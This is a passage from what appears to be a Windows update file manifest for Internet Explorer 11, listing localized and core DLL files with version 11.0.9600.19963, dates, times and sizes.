13-Feb-2021| 13:02| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 53,760 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 30,720 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:26| 2,132,992 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 10,752 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 307,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 293,888 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 290,304 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 282,112 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 283,648 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 291,840 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 299,520 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 275,968 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 293,376 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 258,048 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 256,512 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 288,256 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 285,184 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 297,472 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 288,768 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 286,208 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 281,600 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 286,720 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 292,352 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 242,176 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 243,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 243,200 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 73,728 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 74,240 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 78,848 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 74,752 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 62,464 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 75,264 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 72,192 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 73,216 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 41,472 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 37,888 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 74,240 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 70,656 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 71,168 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 71,680 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 71,168 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 69,632 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 59,904 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 69,120 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 29,696 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 30,720 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 46,080 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 51,712 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 54,272 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 45,056 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 39,936 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 39,424 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 51,200 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 35,328 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 11,264 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 9,216 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 6,656 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 18:15| 4,859,904 \njsproxy.dll| 11.0.9600.19963| 12-Feb-2021| 19:08| 54,784 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 114,176 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 124,928 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 122,880 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 130,048 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 138,240 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 114,688 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 131,584 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 117,760 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 122,368 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 134,144 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 107,008 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 127,488 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 128,512 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 88,576 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 82,944 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 120,320 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 125,952 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 128,000 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 124,416 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 121,856 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 115,712 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 12:45| 390,560 \ninstall.ins| Not versioned| 12-Feb-2021| 16:26| 464 \nieapfltr.dat| 10.0.9301.0| 25-Jun-2019| 6:11| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 800,768 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.19963| 12-Feb-2021| 19:19| 666,624 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 12-Feb-2021| 16:23| 11,892 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.19963| 12-Feb-2021| 19:24| 10,949,120 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 1,422,848 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 809,472 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 60,416 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 19:17| 13,312 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 19:15| 417,280 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:42| 92,672 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 1,360,384 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 25,762,816 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 19:29| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:23| 3,228 \nieetwcollector.exe| 11.0.9600.19963| 12-Feb-2021| 19:04| 116,224 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 19:15| 48,640 \nieetwcollectorres.dll| 